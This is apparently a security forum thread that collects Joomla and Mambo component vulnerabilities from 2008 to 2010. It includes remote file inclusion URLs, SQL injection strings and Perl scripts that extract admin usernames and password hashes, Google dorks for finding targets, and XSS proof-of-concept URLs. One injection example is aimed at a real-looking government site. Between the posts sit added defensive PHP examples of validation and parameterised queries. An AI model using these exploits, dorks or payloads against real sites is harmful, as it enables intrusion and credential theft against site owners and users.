
Joomla && Mambo Vulnerabilities

Thread in the "Vulnerabilities of popular CMSs" section, started by NetSky, 3 Nov 2008.

  1. NetSky
    NetSky adept Moderator
    Likes:
    90
    November 3, 2008

    Software: Flash Tree Gallery (Joomla component) 1.0, possibly other versions.

    Severity: High

    Exploit available: Yes

    Description:
    The vulnerability allows a remote user to execute an arbitrary PHP script on the target system.

    The vulnerability exists due to insufficient sanitization of input data in the "mosConfig_live_site" parameter in the administrator/components/com_treeg/admin.treeg.php script. A remote user can, via a specially crafted request, execute an arbitrary PHP script on the target system with the privileges of the web server. Successful exploitation requires the "register_globals" option to be enabled in the PHP configuration file.


    |::Exploit::|


    Code:
    ==================================================================================================================
    
    
      [o] Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability
    
           Software : com_treeg version 1.0
           Vendor   : http://justjoomla.net/
           Author   : NoGe
           Contact  : noge[dot]code[at]gmail[dot]com
    
    
    ==================================================================================================================
    
    
      [o] Vulnerable file
    
           administrator/components/com_treeg/admin.treeg.php
    
            include( "$mosConfig_live_site/components/com_treeg/about.html" );
    
    
    
      [o] Exploit
    
           http://localhost/[path]/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=[evilcode]
    
    
    ==================================================================================================================
    
    
      [o] Greetz
    
           MainHack BrotherHood [ www.mainhack.com - http://serverisdown.org/blog/]
           VOP Crew [ Vrs-hCk OoN_BoY Paman ]
           H312Y yooogy mousekill }^-^{ kaka11  martfella
           skulmatic olibekas ulga Cungkee k1tk4t str0ke
    
            
    ==================================================================================================================
    
    # milw0rm.com [2008-11-01]



    (c) _www.securitylab.ru
    Original
     
    3 Nov 2008
  2. NetSky
    NetSky adept Moderator
    Likes:
    90
    PHP file inclusion in Joomla Dada Mail Manager

    November 10, 2008

    Software: Dada Mail Manager (Joomla component) 2.6, possibly other versions.

    Severity: High

    Exploit available: Yes

    Description:
    The vulnerability allows a remote user to execute an arbitrary PHP script on the target system.

    The vulnerability exists due to insufficient sanitization of input data in the "mosConfig_absolute_path" parameter in the administrator/components/com_dadamail/config.dadamail.php script. A remote user can, via a specially crafted request, execute an arbitrary PHP script on the target system with the privileges of the web server. Successful exploitation requires the "register_globals" option to be enabled in the PHP configuration file.

    Vendor URL: _joomlander.net/index.php?option=com_remository&Itemid=0&func=fileinfo&id=53

    Solution: No fix for the vulnerability is currently available.


    |::Exploit::|

    Code:
    ======================================================================================================================================
    
    
      [o] Dada Mail Manager Component 2.6 Remote File Inclusion Vulnerability
    
           Software : com_dadamail version 2.6
           Vendor   : http://joomlander.net
           Download : http://joomlacode.org/gf/project/dadamailmanager/frs
           Author   : NoGe
           Contact  : noge[dot]code[at]gmail[dot]com
           Blog     : http://evilc0de.blogspot.com
    
    
    ======================================================================================================================================
    
    
      [o] Vulnerable file
    
           administrator/components/com_dadamail/config.dadamail.php
    
            require_once($GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_dadamail/language/default.php');
    
    
    
      [o] Exploit
    
           http://localhost/[path]/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
    
    
    ======================================================================================================================================
    
    
      [o] Greetz
    
           MainHack BrotherHood [ http://serverisdown.org/blog/]
           Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
           H312Y yooogy mousekill }^-^{ kaka11  martfella
           skulmatic olibekas ulga Cungkee k1tk4t str0ke
    
            
    ======================================================================================================================================
    
    # milw0rm.com [2008-11-05]



    (c) _www.securitylab.ru
    Original
     
    10 Nov 2008
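
Both advisories above describe an include path built from a variable that the request can set once register_globals copies request parameters into the global scope. The following is an added example, not code from com_treeg or com_dadamail: it rejects requests that try to set configuration or superglobal names and reports the PHP settings that make such an include dangerous. The function names are hypothetical; `_VALID_MOS` is the Joomla 1.0 / Mambo entry-point constant.

```php
<?php
// Added example (not code from com_treeg or com_dadamail).
// find_global_overrides() and audit_include_settings() are hypothetical names.

/**
 * Request keys that would overwrite configuration or superglobal state if
 * register_globals, or an extract()-style emulation of it, copied the
 * request into the global scope.
 */
function find_global_overrides(array $request): array
{
    $reserved = ['GLOBALS', '_GET', '_POST', '_COOKIE', '_FILES',
                 '_SERVER', '_ENV', '_REQUEST', '_SESSION'];
    $hits = [];
    foreach (array_keys($request) as $key) {
        $key = (string) $key;
        if (in_array(strtoupper($key), $reserved, true)
            || stripos($key, 'mosConfig_') === 0) {
            $hits[] = $key;
        }
    }
    return $hits;
}

/** PHP settings that turn a tainted include path into code execution. */
function audit_include_settings(): array
{
    $findings = [];
    foreach (['register_globals', 'allow_url_include'] as $name) {
        // ini_get() returns false for a directive this PHP build does not
        // have (register_globals was removed in PHP 5.4).
        if (filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN)) {
            $findings[] = "$name is enabled";
        }
    }
    return $findings;
}

// Constructed requests shaped like the two advisory URLs; [evilcode] is the
// advisories' own placeholder.
$requests = [
    'admin.treeg.php'     => ['mosConfig_live_site' => '[evilcode]'],
    'config.dadamail.php' => ['GLOBALS' => ['mosConfig_absolute_path' => '[evilcode]']],
    'index.php'           => ['option' => 'com_dadamail', 'task' => 'view'],
];
foreach ($requests as $script => $params) {
    $hits = find_global_overrides($params);
    echo $script, ': ',
        ($hits ? 'reject, request sets ' . implode(', ', $hits) : 'ok'), "\n";
}
foreach (audit_include_settings() as $finding) {
    echo "php.ini: $finding\n";
}

// Inside the component file, the include itself should not depend on any
// variable a request can reach:
//   defined('_VALID_MOS') or die('Restricted access');
//   require_once dirname(__FILE__) . '/language/default.php';
```
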
  3. faza02
    faza02 Nobody Newbie
    Likes:
    87
    Joomla Component JooBlog

    Code:
    ####################################################### 
     Joomla Component com_jb2(PostID) SQL-injetion Vulnerability 
    ####################################################### 
     
    ################################################### 
    #[~] Author :  boom3rang 
    #[~] Kosova Hackers Group [www.khg-crew.ws] 
    #[~] Greetz : H!tm@N, KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1. 
     
    #[!] Module_Name:  com_jb2 
    #[!] Script_Name:  Joomla 
    #[!] Google_Dork:  inurl:"option=com_jb2 "PostID" 
    ################################################## 
     
    -------------------------------------------------------------------------------------------------------------------------------------------------- 
    #[~] Example: 
    http://localhost/Path/index.php?option=com_jb2&PostID=[exploit] 
    -------------------------------------------------------------------------------------------------------------------------------------------------- 
    #[~] Exploit: 
    -9999'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/* 
    -------------------------------------------------------------------------------------------------------------------------------------------------- 
     
    ############################## 
    #[!] Proud 2 be Albanian 
    #[!] Proud 2 be Muslim 
    #[!] United States of Albania 
    ############################## 
     
    3 Dec 2008
  4. onthar
    onthar Forum staff Admin
    Likes:
    388
    #Joomla com_phocadocumentation Sql injection#


    PHP:
    #!/usr/bin/perl -w


    #Joomla com_phocadocumentation Sql injection#
    ########################################
    #[~] Author : EcHoLL
    #[~] www.warezturk.org www.tahribat.com
    #[~] Greetz : Black_label TURK Godlike Nitrous

    #[!] Module_Name: com_phocadocumentation
    #[!] Script_Name: Joomla
    #[!] Google_Dork: inurl:"com_phocadocumentation"
    ########################################


    system("color FF0000");
    system("Nohacking");
    print "\t\t-------------------------------------------------------------\n\n";
    print "\t\t| Turkish Securtiy Team |\n\n";
    print "\t\t-------------------------------------------------------------\n\n";
    print "\t\t|Joomla Module com_phocadocumentation(section&id=)Remote SQL Injection Vuln|\n\n";
    print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\n";
    print "\t\t-------------------------------------------------------------\n\n";

    use LWP::UserAgent;

    print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
    chomp(my $target=<STDIN>);

    $column_name="concat(username,0x3a,password)";
    $table_name="jos_users";

    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

    $host = $target . "/index.php?option=com_phocadocumentation&view=section&id=1+AND+1=2+UNION+SELECT+".$column_name.",1,2+from/**/".$table_name."--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
    print "\n[+] Admin Hash : $1\n\n";
    print "# Tebrikler Exploit Calisti! #\n\n";
    }
    else{print "\n[-] Exploit Bulunamadı...\n";
    }

    # milw0rm.com [2009-01-05]
    #Joomla com_na_newsdescription Sql injection#​


    PHP:
    #!/usr/bin/perl -w
     
     
    #Joomla com_na_newsdescription Sql injection#
    ########################################
    #[~] Author :  EcHoLL
    #[~] www.warezturk.org www.tahribat.com
    #[~] Greetz : Black_label TURK Godlike Nitrous
     
    #[!] Module_Name:  com_na_newsdescription
    #[!] Script_Name:  Joomla
    #[!] Google_Dork:  inurl:"com_na_newsdescription"
    ########################################
     
     
    system("color FF0000");
    system("Nohacking");
    print "\t\t-------------------------------------------------------------\n\n";
    print "\t\t|                 Turkish Securtiy Team                      |\n\n";
    print "\t\t-------------------------------------------------------------\n\n";
    print "\t\t|Joomla Module com_na_newsdescription(show&groupId=)Remote SQL Injection Vuln|\n\n";
    print "\t\t|   Coded by: EcHoLL     www.warezturk.org               |\n\n";
    print "\t\t-------------------------------------------------------------\n\n";
     
    use LWP::UserAgent;
     
    print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
     
    chomp(my $target=<STDIN>);
     
    $column_name="concat(username,0x3a,password)";
    $table_name="jos_users";
     
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
     
    $host = $target .   "/index.php?option=com_na_newsdescription&task=show&groupId=17377_19&newsid=85790+AND+1=2+UNION+SELECT+".$column_name.",1,2,3,4,5,6,7+from/**/".$table_name."--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
      print "\n[+] Admin Hash : $1\n\n";
      print "#   Tebrikler Exploit Calisti!  #\n\n";
    }
    else{print "\n[-] Exploit Bulunamadı...\n";
    }

    # milw0rm.com [2009-01-05]
    #Joomla com_simple_review Sql injection#​


    Code:
    #Joomla com_simple_review Sql injection#
    ########################################
    #[~] Author :  EcHoLL
    #[~] www.warezturk.org www.tahribat.com
    #[~] Greetz : Black_label Hippi Godlike Nitrous
    
    #[!] Module_Name:  com_simple_review
    #[!] Script_Name:  Joomla
    #[!] Google_Dork:  inurl:"com_simple_review"
    ########################################
     
    www.scriptpage.com/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--
    
     <name>simple_review</name>
     <creationDate>29/05/2006</creationDate>
     <author>Rowan Youngson</author>
     <copyright>This component in released under the Mozilla Public License Version 1.1</copyright>
     <authorEmail> rowans@gmail.com </authorEmail>
    
     <authorUrl>www.row1.info</authorUrl>
     <version>1.3.5</version>
     <description>Simple Review is a Review component for the Mambo CMS</description>
    
    # milw0rm.com [2009-01-05]
     
    9 Jan 2009
  5. Mei
    Mei bit of love Advanced
    Likes:
    214
    Joomla Exploit

    Joomla com_reservation (Itemid) Remote SQL Injection Exploit

    Code:
    #!/usr/bin/perl -w
     
    
    
    ###############################################
    #[~] Author         :ByALBAYX                 #
    #                                             #
    #[~] Web Site       :WWW.C4TEAM.ORG           #
    #                                             #
    #[~] Component_Name :Reservation Manager      #
    #[~] Component_Name :Reservation Manager Pro  #
    #                                             #
    #[~] Script_Name    :Joomla                   #
    #                                             #
    #[~] Dork           :com_reservation   vs..   #
    #                                             # 
    #[~] S.Site         :http://webformatique.com #     
    #                                             #     
    ###############################################
    
     
     
    system("color f");
    print "\t\t-------------------------------------------------------------\n\n";
    print "\t\t|||                        C4 TEAM                         |||\n\n";
    print "\t\t-------------------------------------------------------------\n\n";
    print "\t\t|||      Reservation Manager Pro  Remote SQL Inj Vuln      |||\n\n";
    print "\t\t|||       BYALBAYX     WWWW.C4TEAM.ORG     BYALBAYX        |||\n\n";
    print "\t\t-------------------------------------------------------------\n\n";
     
    use LWP::UserAgent;
     
    print "\n[http://wwww.site.com/path/]: ";
     chomp(my $target=<STDIN>);
     
    $column_name="concat(username,0x3a,password)";
    $table_name="jos_users";
     
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
     
    $host = $target .   "/index.php?option=com_reservation&Itemid=1+union+select+1,".$column_name."+from/**/".$table_name."--";
    $res = $b->request(HTTP::Request->new(GET=>$host));$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
      print "\n[+] Admin Hash : $1\n\n";
      print "#   Tebrikler Exploit Calisti!  #\n\n";
    }
    else{print "\n[-] Exploit Calismadi...\n";
    }
    
    # milw0rm.com [2009-03-04

     
    Last edited by a moderator: 5 Mar 2009
    4 Mar 2009
    1 person likes this.
  6. Hookman
    Hookman Developer Global Moderator
    Likes:
    241
    Joomla! 1.5.10 JA_Purity Multiple Persistent XSS

    Code:
    =============================================
    INTERNET SECURITY AUDITORS ALERT 2009-006
    - Original release date: April 5th, 2009
    - Last revised: June 5th, 2009
    - Discovered by: Juan Galiana Lara
    - Severity: 6.4/10 (CVSS Base Score)
    =============================================
    
    I. VULNERABILITY
    -------------------------
    Joomla! 1.5.10 JA_Purity Multiple Persistent XSS
    
    II. BACKGROUND
    -------------------------
    Joomla! is an award-winning content management system (CMS), which
    enables you to build Web sites and powerful online applications. Many
    aspects, including its ease-of-use and extensibility, have made
    Joomla! the most popular Web site software available. Best of all,
    Joomla! is an open source solution that is freely available to everyone.
    Joomla! comes with 3 default templates, JA_Purity is one of them.
    
    III. DESCRIPTION
    -------------------------
    JA_Purity template is bundled in Joomla! and fails to sanitized user
    supplied input. An attacker can inject JavaScript or DHTML that will
    be saved in the cookie making persistent, running in the context of
    targeted user browser, allowing him to steal cookies.
    
    In file 'template/ja_purity/ja_templatetools.php', the
    getUserSetting() reads $_GET array and makes the data persistent
    setting it in a cookie:
    
    define ('JA_TOOL_FONT', 'ja_font');
    ...
    function getUserSetting(){
    $exp = time() + 60*60*24*355;
    if (isset($_COOKIE[$this->template.'_tpl']) &&
    $_COOKIE[$this->template.'_tpl'] == $this->template){
    foreach($this->_params_cookie as $k=>$v) {
    $kc = $this->template."_".$k;
    if (isset($_GET[$k])){
    $v = $_GET[$k];
    setcookie ($kc, $v, $exp, '/');
    }else{
    if (isset($_COOKIE[$kc])){
    $v = $_COOKIE[$kc];
    }
    }
    $this->setParam($k, $v);
    }
    
    }else{
    setcookie ($this->template.'_tpl', $this->template, $exp,
    '/');
    }
    return $this;
    }
    
    function getParam ($param, $default='') {
    if (isset($this->_params_cookie[$param])) {
    return $this->_params_cookie[$param];
    }
    return $this->_tpl->params->get($param, $default);
    }
    
    function setParam ($param, $value) {
    $this->_params_cookie[$param] = $value;
    }
    
    File 'template/ja_purity/index.php' reads data with getParam and write
    it directly:
    
    <?php if ($tmpTools->getParam('theme_header') &&
    $tmpTools->getParam('theme_header')!='-1') : ?>
    <link rel="stylesheet" href="<?php echo $tmpTools->templateurl();
    ?>/styles/header/<?php echo $tmpTools->getParam('theme_header');
    ?>/style.css" type="text/css" />
    <?php endif; ?>
    <?php if ($tmpTools->getParam('theme_background') &&
    $tmpTools->getParam('theme_background')!='-1') : ?>
    <link rel="stylesheet" href="<?php echo $tmpTools->templateurl();
    ?>/styles/background/<?php echo
    $tmpTools->getParam('theme_background'); ?>/style.css" type="text/css" />
    <?php endif; ?>
    <?php if ($tmpTools->getParam('theme_elements') &&
    $tmpTools->getParam('theme_elements')!='-1') : ?>
    <link rel="stylesheet" href="<?php echo $tmpTools->templateurl();
    ?>/styles/elements/<?php echo $tmpTools->getParam('theme_elements');
    ?>/style.css" type="text/css" />
    <?php endif; ?>
    
    <body id="bd" class="fs<?php echo
    $tmpTools->getParam(JA_TOOL_FONT);?> <?php echo $tmpTools->browser();?>" >
    
    if ($tmpTools->getParam('logoType')=='image'): ?>
    <h1 class="logo">
    <a href="index.php" title="<?php echo $siteName;
    ?>"><span><?php echo $siteName; ?></span></a>
    </h1>
    <?php else:
    $logoText = (trim($tmpTools->getParam('logoText'))=='') ?
    $config->sitename : $tmpTools->getParam('logoText');
    $sloganText = (trim($tmpTools->getParam('sloganText'))=='')
    ? JText::_('SITE SLOGAN') : $tmpTools->getParam('sloganText'); ?>
    <h1 class="logo-text">
    <a href="index.php" title="<?php echo $siteName;
    ?>"><span><?php echo $logoText; ?></span></a>
    </h1>
    <p class="site-slogan"><?php echo $sloganText;?></p>
    <?php endif; ?>
    
    These are all the variables of JA_Purity template, most of them are
    vulnerable:
    
    logoType
    logoText
    sloganText
    ja_font
    ja_screen
    ja_screen_width
    theme_header
    theme_background
    theme_elements
    horNav
    horNavType
    rightCollapsible
    rightCollapseDefault
    excludeModules
    showComponent
    
    IV. PROOF OF CONCEPT
    -------------------------
    http://site/path/?theme_header=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%
    2Fscript%3E
    http://site/path/?theme_background=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B
    %3C%2Fscript%3E
    http://site/path/?theme_elements=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3
    C%2Fscript%3E
    http://site/path/?logoType=1&logoText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C
    %2Fscript%3E
    http://site/path/?logoType=1&sloganText=%3Cscript%3Ealert(%2FXSS%2F)%3B%
    3C%2Fscript%3E
    http://site/path/?excludeModules=%27;alert(8);%20var%20b=%27
    http://site/path/?rightCollapseDefault=%27;alert(8);%20var%20b=%27
    http://site/path/?ja_font=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscr
    ipt%3E
    
    V. BUSINESS IMPACT
    -------------------------
    An attacker can exploit the vulnerability to store persistent XSS.
    This may lead in steal the targeted user cookies and gain access to
    the user account.
    
    VI. SYSTEMS AFFECTED
    -------------------------
    Joomla! <= 1.5.10 is vulnerable which comes with JA_Purity template 1.2.0
    
    VII. SOLUTION
    -------------------------
    Upgrade to version 1.5.11.
    
    All inputs should be sanitized at setParam/getParam function, in the
    same way is done in libraries/joomla/environment/request.php:140 with
    $var = JRequest::_cleanVar($input[$name], $mask, $type);
    
    VIII. REFERENCES
    -------------------------
    http://www.joomla.org
    http://www.joomlart.org
    http://www.isecauditors.com
    
    IX. CREDITS
    -------------------------
    This vulnerability has been discovered
    by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
    
    X. REVISION HISTORY
    -------------------------
    April 5, 2009: Initial release.
    June 5, 2009: Last revision.
    
    XI. DISCLOSURE TIMELINE
    -------------------------
    April 5, 2009: Discovered by Internet Security Auditors.
    April 6, 2009: Vendor contacted. They will study the advisory.
    May-June, 2009: No responses to queries about patching schedule.
    June 3, 2009: Security Release 1.5.11 published.
    
    XII. LEGAL NOTICES
    -------------------------
    The information contained within this advisory is supplied "as-is"
    with no warranties or guarantees of fitness of use or otherwise.
    Internet Security Auditors accepts no responsibility for any damage
    caused by the use or misuse of this information.
    securityfocus.com
     
    Last edited: 15 Jun 2009
    14 Jun 2009
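
The fix the advisory recommends, validating at setParam/getParam, shown as an added example (not JA_Purity or Joomla code): each cookie-backed setting is checked against an expected shape before it is stored, and escaped for the context it is printed in. The class name and the allowed value shapes are assumptions; the sample request uses the advisory's proof-of-concept values, URL-decoded.

```php
<?php
// Added example (PHP 7.4+), not JA_Purity's code. The class name and the
// allowed value shapes are assumptions; a real template would list its own.

final class TemplateSettings
{
    // Shape each setting must have. \A and \z are used instead of ^ and $
    // because $ also matches before a trailing newline.
    private const RULES = [
        'theme_header'     => '/\A[a-z0-9_-]{1,32}\z/i',
        'theme_background' => '/\A[a-z0-9_-]{1,32}\z/i',
        'theme_elements'   => '/\A[a-z0-9_-]{1,32}\z/i',
        'ja_font'          => '/\A[1-9]\z/',
        'logoType'         => '/\A(image|text)\z/',
        'excludeModules'   => '/\A(\d+(,\d+)*)?\z/',
    ];
    private const FREE_TEXT_MAX = 80; // applies to logoText, sloganText

    private array $values;

    public function __construct(array $defaults)
    {
        $this->values = $defaults;
    }

    /**
     * Merge request and cookie values over the defaults. Returns the names
     * whose cookie the caller should write; rejected input is never persisted.
     */
    public function load(array $get, array $cookie, string $prefix): array
    {
        $persist = [];
        foreach (array_keys($this->values) as $name) {
            $fromGet = array_key_exists($name, $get);
            $raw = $fromGet ? $get[$name] : ($cookie[$prefix . '_' . $name] ?? null);
            if (!is_string($raw) || !$this->isValid($name, $raw)) {
                continue; // keep the default
            }
            $this->values[$name] = $raw;
            if ($fromGet) {
                $persist[] = $name;
            }
        }
        return $persist;
    }

    private function isValid(string $name, string $raw): bool
    {
        if (array_key_exists($name, self::RULES)) {
            return preg_match(self::RULES[$name], $raw) === 1;
        }
        // Free text: length-capped, no control characters, escaped on output.
        return strlen($raw) <= self::FREE_TEXT_MAX
            && preg_match('/[\x00-\x1f]/', $raw) === 0;
    }

    /** For HTML text and quoted attribute values. */
    public function html(string $name): string
    {
        return htmlspecialchars($this->values[$name] ?? '', ENT_QUOTES, 'UTF-8');
    }

    /** For values written into an inline <script> block. */
    public function js(string $name): string
    {
        $flags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP;
        return json_encode((string) ($this->values[$name] ?? ''), $flags) ?: '""';
    }
}

$settings = new TemplateSettings([
    'theme_header' => '-1', 'ja_font' => '3', 'logoType' => 'image',
    'logoText' => '', 'excludeModules' => '',
]);

// Constructed request: the advisory's proof-of-concept values, URL-decoded.
$persist = $settings->load([
    'theme_header'   => '"><script>alert(/XSS/);</script>',
    'excludeModules' => "';alert(8); var b='",
    'logoText'       => '<script>alert(/XSS/);</script>',
    'ja_font'        => '5',
], [], 'ja_purity');

echo 'cookies to write: ', implode(', ', $persist), "\n";
echo 'theme_header attribute: ', $settings->html('theme_header'), "\n";
echo 'logoText in HTML: ', $settings->html('logoText'), "\n";
echo 'excludeModules in JS: ', $settings->js('excludeModules'), "\n";
```
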
  7. Hookman
    Hookman Developer Global Moderator
    Likes:
    241
    Software: HD FLV Player (Joomla component) 1.3, possibly earlier versions

    Severity: Medium

    Exploit available: No

    Description:
    The vulnerability allows a remote user to execute arbitrary SQL commands in the application's database.

    The vulnerability exists due to insufficient sanitization of input data in the "id" parameter in the index.php script when the "option" parameter is set to "com_hdflvplayer". A remote user can, via a specially crafted request, execute arbitrary SQL commands in the application's database.

    Vendor URL: www.hdflvplayer.net

    Solution: No fix for the vulnerability is currently available.
    ©securitylab.ru

    Example
    Code:
    ht*p://30days.isaf.nato.int/index.php?option=com_hdflvplayer&Itemid=127&id=27+and+0--&page=1
    Code:
    ht*p://30days.isaf.nato.int/index.php?option=com_hdflvplayer&Itemid=127&id=27+and+1--&page=1
     
    3 Mar 2010
  8. Nosaer
    Nosaer Moderator
    Likes:
    15
    SQL injection in Joomla YaNC (component)
    The vulnerability allows a remote user to execute arbitrary SQL commands in the application's database.

    The vulnerability exists due to insufficient sanitization of input data in the "listid" parameter in the index.php script when the "option" parameter is set to "com_yanc". A remote user can, via a specially crafted request, execute arbitrary SQL commands in the application's database.

    No fix for the vulnerability is currently available.

    Code:
    [*] Author    :  His0k4 [ALGERIAN HaCkEr]
    
    [*] Dork      :  inurl:com_yanc listid
    
    [*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_yanc&Itemid=179&listid={SQL}
    
    [*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_yanc&Itemid=179&listid=-1 UNION SELECT concat(username,0x3a,password),@@version FROM jos_users--
     
    17 Mar 2010
  9. Nosaer
    Nosaer Moderator
    Likes:
    15
    Multiple vulnerabilities in Joomla VXDate

    VXDate (Joomla component)
    Description:
    The discovered vulnerabilities allow a remote user to conduct an XSS attack and execute arbitrary SQL commands in the application's database.

    1. The vulnerability exists due to insufficient sanitization of input data in the "id" parameter in the index.php script when the "option" parameter is set to "com_vxdate", the "md" parameter is set to "details" or "editform", and the "ct" parameter is set. A remote user can, via a specially crafted request, execute arbitrary script code in the victim's browser in the security context of the vulnerable site.

    2. The vulnerability exists due to insufficient sanitization of input data in the "id" parameter in the index.php script when the "option" parameter is set to "com_vxdate", the "md" parameter is set to "details" or "editform", and the "ct" parameter is set. A remote user can, via a specially crafted request, execute arbitrary SQL commands in the application's database.

    Code:
    SQL Injection:
    
    http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5
    
    http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5
    
    XSS:
    
    http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
    http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Source
     
    19 Mar 2010
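
The SQL injection entries in this thread (JooBlog, phocadocumentation, HD FLV Player, YaNC, VXDate and the rest) all describe a numeric request parameter reaching a query unchanged. The following added example, not code from any of those components, runs the concatenated form next to a validated and bound form over inputs in the shapes posted above. In-memory SQLite (pdo_sqlite) stands in for Joomla's MySQL layer; `jos_yanc_lists`, its columns and the `jos_users` row are constructed.

```php
<?php
// Added example, not code from any component in this thread. SQLite in
// memory stands in for MySQL; jos_yanc_lists and its columns are
// hypothetical, and the jos_users row is constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT)');
$db->exec("INSERT INTO jos_users VALUES (62, 'admin', 'constructed-hash')");
$db->exec('CREATE TABLE jos_yanc_lists (id INTEGER, name TEXT, descr TEXT)');
$db->exec("INSERT INTO jos_yanc_lists VALUES (1, 'News', 'Monthly letter')");

/** The pattern the advisories describe: request text pasted into the query. */
function list_concat(PDO $db, string $listid): array
{
    $sql = "SELECT name, descr FROM jos_yanc_lists WHERE id = $listid";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

/**
 * Hardened form: the value must parse as a positive integer (the role
 * JRequest::getInt() plays in Joomla 1.5) and is bound, never pasted.
 */
function list_bound(PDO $db, string $listid): array
{
    $id = filter_var($listid, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];
    }
    $stmt = $db->prepare('SELECT name, descr FROM jos_yanc_lists WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Constructed inputs in the shapes posted in this thread: a plain id, the
// "and 0" / "and 1" pair, and a UNION against jos_users.
$inputs = [
    '1',
    '1 and 0--',
    '1 and 1--',
    '-1 UNION SELECT username, password FROM jos_users--',
];
foreach ($inputs as $listid) {
    printf("%-55s concat=%d row(s)  bound=%d row(s)\n", $listid,
        count(list_concat($db, $listid)), count(list_bound($db, $listid)));
}
```

The concatenated form answers the "and 0" and "and 1" inputs differently and returns the `jos_users` row for the UNION input; the bound form returns a row only for the plain id.
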
  10. Nosaer
    Nosaer Moderator
    Likes:
    15
    JE Form Creator (Joomla! component)

    JE Form Creator
    The vulnerability allows a remote user to gain access to sensitive data on the system.

    The vulnerability exists due to insufficient sanitization of input data in the "view" parameter in the index.php script when the "option" parameter is set to "com_jeformcr". A remote user can, via a specially crafted request containing directory traversal characters, view the contents of arbitrary files on the system. Successful exploitation requires the "magic_quotes_gpc" option to be disabled in the PHP configuration file.

    P.S. I hope everyone knows how to use a dot and a slash))
     
    23 Mar 2010
    1 person likes this.
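
The JE Form Creator entry above describes a "view" parameter that reaches the file system with traversal characters intact. The following added example, not the component's code, maps a view name to a file only when the name is a plain identifier and the resolved path stays inside the views directory. `resolve_view()` and the directory layout are hypothetical; the files are constructed in a temporary directory.

```php
<?php
// Added example (not JE Form Creator's code). resolve_view() and the
// directory layout are hypothetical.

/**
 * Map a request-supplied view name to a file under $viewsDir.
 * Returns the real path, or null when the name is not a plain identifier
 * or the resolved file falls outside $viewsDir.
 */
function resolve_view(string $viewsDir, string $view): ?string
{
    // Plain identifier only: no dots, slashes, backslashes or NUL bytes.
    if (preg_match('/\A[a-z0-9_]{1,64}\z/i', $view) !== 1) {
        return null;
    }
    $base = realpath($viewsDir);
    $file = realpath($viewsDir . DIRECTORY_SEPARATOR . $view . '.php');
    if ($base === false || $file === false || !is_file($file)) {
        return null;
    }
    // Defence in depth: a symlink inside views/ must not lead out of it.
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Constructed layout: views/form.php next to a configuration file that must
// never be served.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'jeformcr_demo_' . getmypid();
mkdir($root . '/views', 0700, true);
file_put_contents($root . '/views/form.php', "<?php // view\n");
file_put_contents($root . '/configuration.php', "<?php // settings\n");

// Constructed inputs: a legitimate view name, a name with traversal
// characters, and a name carrying a NUL byte.
foreach (['form', '../configuration', "form\0"] as $view) {
    $path = resolve_view($root . '/views', $view);
    echo json_encode($view), ' => ', ($path === null ? 'rejected' : 'served'), "\n";
}

// Remove the constructed files.
unlink($root . '/views/form.php');
unlink($root . '/configuration.php');
rmdir($root . '/views');
rmdir($root);
```
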
  11. Nosaer
    Nosaer Moderator
    Likes:
    15
    A lousy day for Joomla components

    Joomla Component com_departments SQL Injection Vulnerability
    Code:
    # Title : Joomla Component com_departments SQL Injection Vulnerability
    # Author: DevilZ TM
    # Data  : 2010-03-29
    
    [~]######################################### InformatioN #############################################[~]
     
    [~] Title     : Joomla Component com_departments SQL Injection Vulnerability
    [~] Author    : DevilZ TM By D3v1l
    [~] Homepage  : http://www.DEVILZTM.com
    [~] Email     : Expl0it@DevilZTM.Com
